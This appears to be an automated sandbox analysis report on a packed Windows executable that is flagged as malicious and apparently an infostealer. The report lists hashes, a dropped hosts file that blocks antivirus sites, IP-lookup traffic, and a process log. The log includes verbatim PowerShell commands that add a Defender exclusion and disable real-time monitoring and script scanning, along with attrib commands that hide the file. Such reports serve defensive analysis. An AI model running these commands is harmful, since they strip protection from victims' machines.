                                                                                    SSDEEP:49152:gikXNdLQ4Vfk5AzqIaoiZ8MbSBSFVAYFH9h1LGbExIVOJdWAZ5N0kWfNYWMizPat:fqg9OCR8MbSBUAYFHBBvZlWllrTaGq
                                                                                    MD5:2B344D8644F0D502C4C8370EF8674A51
                                                                                    SHA1:D14F20EAF8EA75D6F10C85E2B18FB1D0EE8781DA
                                                                                    SHA-256:BC1B77F9680B9028EFD499E3E741D46DB003F5470A8B61D21E445EAEB7141045
                                                                                    SHA-512:662EDF49F1F008205555CCD39A3B830AE5F42EF9B4B05BD8D8E8432F21ABA38EED718AD8C7B705A95A6A1C7C775E07A2F88AB81CFB8D249E458B055C6F89F8D4
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........T........".......4......po.Pb....o...@...........................................`... ..............................................p..................T...................................................................................................UPX0.....po.............................UPX1......4...o...4.................@...UPX2.........p........4.............@...4.24.UPX!.$..2.m.Yl=.K....4..V.....U<.........Pm.|E...B..EBW1.3.y..Y'...S..#x.TH.*...d.......m.+..1...3....Y`...*.........(:....W.'.-Sd.l.*.?.(.KI:9Ga.....q..|....F..N. ....8.u..u5Z..a...FIO.)..zi.....5.....)N.*^.^..&..r.9..:...=..<....O..3...K../o...J.}..l.@W.X..P.j..E&C..!.....I.&.....uQW..I...."...^u..&6...Zv........h....$.O.kW...Zx.XQw-....lF.%&..j...........M..&"....n.bb.$>..b..n.....U..|r.y(............k..N...@...a.l..z9..R.|..(...r.....?.ST..J..Q..&..

                                                                                    C:\Windows\System32\drivers\etc\hosts

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):2165
                                                                                    Entropy (8bit):4.522303506272206
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:vDZhyoZWM9rU5fFcqwUYi1iBopn2g2+oGSVy2w23c4Zezwd0/a7S4qqBLE97aFsL:vDZEurK9UUlcBsn2g2+lSw2w23c4ZezT
                                                                                    MD5:BD87D7EA7B5DBD74CC0B0E38477F6079
                                                                                    SHA1:63C28862A5D0052F2425A8B45AC0F66572A02F33
                                                                                    SHA-256:EB97F9588DFFD94BC3B06EAED77751593F32F9E0D09A9B7868746AB16E7F45F1
                                                                                    SHA-512:1DD93CD24870D9716980B38145A1DC23F8EFB5DB93DB9D5223C1D0984CD8E064C6C99B6833F7066392BA79D887AC37F0BA3D8D5CD657B56967D51A2836C52AF0
                                                                                    Malicious:true
                                                                                    Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 virustotal.com.0.0.0.0 www.virustotal.com.0.0.0.0 avast.com.0.0.0.0 www.avast.com.0.0.0.0 totalav.com.0.0.0.0 www.totalav.com.0.0.0.0 scanguard.com.0.0.0.0 www.scanguar

                                                                                    \Device\Null

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with very long lines (381), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):392
                                                                                    Entropy (8bit):5.237198052265355
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:0k4+DgBWg/sK2vAPKZC92/4jJpBVd+min79eEno:0k4+tgsZS2kX+TxXo
                                                                                    MD5:7F599F4277A8C4152074D773FD3AB801
                                                                                    SHA1:D19F04FD5E944642D6C5D684EBAB2F42C1177197
                                                                                    SHA-256:A3639AF5E23464FC391DAE127FD5493F02C8178068A35866D9C7FDD35DCD623F
                                                                                    SHA-512:CCE2C7C5240EA0D59C9C01C3AB3E3D7B4E0B026D5385B330D5B60D45B01D4D9CF5662B22F445154EE7368DF09D0D6C863D7019D20CDDFBC6E7C533774B46707B
                                                                                    Malicious:false
                                                                                    Preview:#< CLIXML..<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                    Entropy (8bit):7.999928725904616
                                                                                    TrID:
                                                                                    • Win64 Executable Console (202006/5) 81.26%
                                                                                    • UPX compressed Win32 Executable (30571/9) 12.30%
                                                                                    • Win64 Executable (generic) (12005/4) 4.83%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.81%
                                                                                    • DOS Executable Generic (2002/1) 0.81%
                                                                                    File name:WdlA0C4PkO.exe
                                                                                    File size:3'469'824 bytes
                                                                                    MD5:2b344d8644f0d502c4c8370ef8674a51
                                                                                    SHA1:d14f20eaf8ea75d6f10c85e2b18fb1d0ee8781da
                                                                                    SHA256:bc1b77f9680b9028efd499e3e741d46db003f5470a8b61d21e445eaeb7141045
                                                                                    SHA512:662edf49f1f008205555ccd39a3b830ae5f42ef9b4b05bd8d8e8432f21aba38eed718ad8c7b705a95a6a1c7c775e07a2f88ab81cfb8d249e458b055c6f89f8d4
                                                                                    SSDEEP:49152:gikXNdLQ4Vfk5AzqIaoiZ8MbSBSFVAYFH9h1LGbExIVOJdWAZ5N0kWfNYWMizPat:fqg9OCR8MbSBUAYFHBBvZlWllrTaGq
                                                                                    TLSH:31F5333BBBCBB699EC9820BEE2ED519F1E91477D46839FA703318A426D7D116204D40F
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........T........".......4......po.Pb....o...@...........................................`... ............................

                                                                                    File Icon

                                                                                    Icon Hash:00928e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0xe46250
                                                                                    Entrypoint Section:UPX1
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows cui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:1
                                                                                    File Version Major:6
                                                                                    File Version Minor:1
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:1
                                                                                    Import Hash:6ed4f5f04d62b18d96b26d6db7c18840

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push ebp
                                                                                    dec eax
                                                                                    lea esi, dword ptr [FFCB1DCAh]
                                                                                    dec eax
                                                                                    lea edi, dword ptr [esi-006F7025h]
                                                                                    push edi
                                                                                    mov eax, 00A44BE8h
                                                                                    push eax
                                                                                    dec eax
                                                                                    mov ecx, esp
                                                                                    dec eax
                                                                                    mov edx, edi
                                                                                    dec eax
                                                                                    mov edi, esi
                                                                                    mov esi, 0034E21Dh
                                                                                    push ebp
                                                                                    dec eax
                                                                                    mov ebp, esp
                                                                                    inc esp
                                                                                    mov ecx, dword ptr [ecx]
                                                                                    dec ecx
                                                                                    mov eax, edx
                                                                                    dec eax
                                                                                    mov edx, esi
                                                                                    dec eax
                                                                                    lea esi, dword ptr [edi+02h]
                                                                                    push esi
                                                                                    mov al, byte ptr [edi]
                                                                                    dec edx
                                                                                    mov cl, al
                                                                                    and al, 07h
                                                                                    shr cl, 00000003h
                                                                                    dec eax
                                                                                    mov ebx, FFFFFD00h
                                                                                    dec eax
                                                                                    shl ebx, cl
                                                                                    mov cl, al
                                                                                    dec eax
                                                                                    lea ebx, dword ptr [esp+ebx*2-00000E78h]
                                                                                    dec eax
                                                                                    and ebx, FFFFFFC0h
                                                                                    push 00000000h
                                                                                    dec eax
                                                                                    cmp esp, ebx
                                                                                    jne 00007FDA6499A05Bh
                                                                                    push ebx
                                                                                    dec eax
                                                                                    lea edi, dword ptr [ebx+08h]
                                                                                    mov cl, byte ptr [esi-01h]
                                                                                    dec edx
                                                                                    mov byte ptr [edi+02h], al
                                                                                    mov al, cl
                                                                                    shr cl, 00000004h
                                                                                    mov byte ptr [edi+01h], cl
                                                                                    and al, 0Fh
                                                                                    mov byte ptr [edi], al
                                                                                    dec eax
                                                                                    lea ecx, dword ptr [edi-04h]
                                                                                    push eax
                                                                                    inc ecx
                                                                                    push edi
                                                                                    dec eax
                                                                                    lea eax, dword ptr [edi+04h]
                                                                                    inc ebp
                                                                                    xor edi, edi
                                                                                    inc ecx
                                                                                    push esi
                                                                                    inc ecx
                                                                                    mov esi, 00000001h
                                                                                    inc ecx
                                                                                    push ebp
                                                                                    inc ebp
                                                                                    xor ebp, ebp
                                                                                    inc ecx
                                                                                    push esp
                                                                                    push ebp
                                                                                    push ebx
                                                                                    dec eax
                                                                                    sub esp, 48h
                                                                                    dec eax
                                                                                    mov dword ptr [esp+38h], ecx
                                                                                    dec eax
                                                                                    mov dword ptr [esp+20h], eax
                                                                                    mov eax, 00000001h
                                                                                    dec eax
                                                                                    mov dword ptr [esp+40h], esi
                                                                                    dec esp
                                                                                    mov dword ptr [esp+30h], eax
                                                                                    mov ebx, eax
                                                                                    inc esp
                                                                                    mov dword ptr [esp+2Ch], ecx
                                                                                    movzx ecx, byte ptr [edi+02h]
                                                                                    shl ebx, cl
                                                                                    mov ecx, ebx

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa470000x9cUPX2
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0xa0c0000x1bc54UPX1
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    UPX00x10000x6f70000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    UPX10x6f80000x34f0000x34ee00e4c9a87eaabc5d668f2bca6c44d17477unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    UPX20xa470000x10000x2000d026308cf9c08bebb8f207723307c16False0.1953125data1.3719135890817398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 18, 2024 21:25:03.015376091 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:03.015450001 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:03.015532970 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:03.016215086 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:03.016227007 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:04.237970114 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:04.241945982 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:04.241970062 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:04.242119074 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:04.242124081 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:04.243999958 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:04.244112968 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:04.345619917 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:04.345851898 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:04.345909119 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:04.394890070 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:04.394917965 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:04.442888021 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:04.698540926 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:04.698612928 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:04.698685884 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:04.698960066 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:04.699012995 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:04.699043989 CET49707443192.168.2.9104.26.12.205
                                                                                    Dec 18, 2024 21:25:04.699059963 CET44349707104.26.12.205192.168.2.9
                                                                                    Dec 18, 2024 21:25:05.566143990 CET4970880192.168.2.9208.95.112.1
                                                                                    Dec 18, 2024 21:25:05.685866117 CET8049708208.95.112.1192.168.2.9
                                                                                    Dec 18, 2024 21:25:05.685976982 CET4970880192.168.2.9208.95.112.1
                                                                                    Dec 18, 2024 21:25:05.686403990 CET4970880192.168.2.9208.95.112.1
                                                                                    Dec 18, 2024 21:25:05.806083918 CET8049708208.95.112.1192.168.2.9
                                                                                    Dec 18, 2024 21:25:06.791457891 CET8049708208.95.112.1192.168.2.9
                                                                                    Dec 18, 2024 21:25:06.842977047 CET4970880192.168.2.9208.95.112.1
                                                                                    Dec 18, 2024 21:25:18.303844929 CET4970880192.168.2.9208.95.112.1
                                                                                    Dec 18, 2024 21:25:18.423572063 CET8049708208.95.112.1192.168.2.9
                                                                                    Dec 18, 2024 21:25:18.623378992 CET8049708208.95.112.1192.168.2.9
                                                                                    Dec 18, 2024 21:25:18.758171082 CET4970880192.168.2.9208.95.112.1
                                                                                    Dec 18, 2024 21:25:48.664314985 CET4970880192.168.2.9208.95.112.1
                                                                                    Dec 18, 2024 21:25:48.783843040 CET8049708208.95.112.1192.168.2.9
                                                                                    Dec 18, 2024 21:26:10.263999939 CET8049708208.95.112.1192.168.2.9
                                                                                    Dec 18, 2024 21:26:10.264070988 CET4970880192.168.2.9208.95.112.1
                                                                                    Dec 18, 2024 21:26:10.269349098 CET4970880192.168.2.9208.95.112.1
                                                                                    Dec 18, 2024 21:26:10.388997078 CET8049708208.95.112.1192.168.2.9

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 18, 2024 21:25:02.871206045 CET4929153192.168.2.91.1.1.1
                                                                                    Dec 18, 2024 21:25:03.008239985 CET53492911.1.1.1192.168.2.9
                                                                                    Dec 18, 2024 21:25:05.427726030 CET4962153192.168.2.91.1.1.1
                                                                                    Dec 18, 2024 21:25:05.565123081 CET53496211.1.1.1192.168.2.9

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 18, 2024 21:25:02.871206045 CET192.168.2.91.1.1.10x29eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 21:25:05.427726030 CET192.168.2.91.1.1.10x3f72Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 18, 2024 21:25:03.008239985 CET1.1.1.1192.168.2.90x29eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 21:25:03.008239985 CET1.1.1.1192.168.2.90x29eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 21:25:03.008239985 CET1.1.1.1192.168.2.90x29eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                    Dec 18, 2024 21:25:05.565123081 CET1.1.1.1192.168.2.90x3f72No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • api.ipify.org
                                                                                    • ip-api.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.949708208.95.112.1807648C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 18, 2024 21:25:05.686403990 CET111OUTGET /line/?fields=hosting HTTP/1.1
                                                                                    Host: ip-api.com
                                                                                    User-Agent: Go-http-client/1.1
                                                                                    Accept-Encoding: gzip
                                                                                    Dec 18, 2024 21:25:06.791457891 CET175INHTTP/1.1 200 OK
                                                                                    Date: Wed, 18 Dec 2024 20:25:06 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 6
                                                                                    Access-Control-Allow-Origin: *
                                                                                    X-Ttl: 60
                                                                                    X-Rl: 44
                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                    Data Ascii: false
                                                                                    Dec 18, 2024 21:25:18.303844929 CET95OUTGET /json HTTP/1.1
                                                                                    Host: ip-api.com
                                                                                    User-Agent: Go-http-client/1.1
                                                                                    Accept-Encoding: gzip
                                                                                    Dec 18, 2024 21:25:18.623378992 CET483INHTTP/1.1 200 OK
                                                                                    Date: Wed, 18 Dec 2024 20:25:18 GMT
                                                                                    Content-Type: application/json; charset=utf-8
                                                                                    Content-Length: 306
                                                                                    Access-Control-Allow-Origin: *
                                                                                    X-Ttl: 60
                                                                                    X-Rl: 44
                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}
                                                                                    Dec 18, 2024 21:25:48.664314985 CET6OUTData Raw: 00
                                                                                    Data Ascii:


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.949707104.26.12.2054437648C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-18 20:25:04 UTC94OUTGET / HTTP/1.1
                                                                                    Host: api.ipify.org
                                                                                    User-Agent: Go-http-client/1.1
                                                                                    Accept-Encoding: gzip
                                                                                    2024-12-18 20:25:04 UTC424INHTTP/1.1 200 OK
                                                                                    Date: Wed, 18 Dec 2024 20:25:04 GMT
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 12
                                                                                    Connection: close
                                                                                    Vary: Origin
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f41e14b3dee729f-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2058&min_rtt=2057&rtt_var=772&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=709&delivery_rate=1419543&cwnd=169&unsent_bytes=0&cid=20025316852b17be&ts=473&x=0"
                                                                                    2024-12-18 20:25:04 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                    Data Ascii: 8.46.123.189


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:15:25:01
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\WdlA0C4PkO.exe"
                                                                                    Imagebase:0x150000
                                                                                    File size:3'469'824 bytes
                                                                                    MD5 hash:2B344D8644F0D502C4C8370EF8674A51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:15:25:01
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff70f010000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:15:25:02
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:attrib +h +s C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    Imagebase:0x7ff77c430000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:15:25:02
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                    Imagebase:0x7ff77c430000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:15:25:04
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic csproduct get UUID
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:15:25:06
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:15:25:07
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:15:25:07
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic os get Caption
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:15:25:08
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic cpu get Name
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:15:25:11
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                    Imagebase:0x7ff7e3f60000
                                                                                    File size:576'000 bytes
                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:15:25:12
                                                                                    Start date:18/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                    Imagebase:0x7ff760310000
                                                                                    File size:452'608 bytes
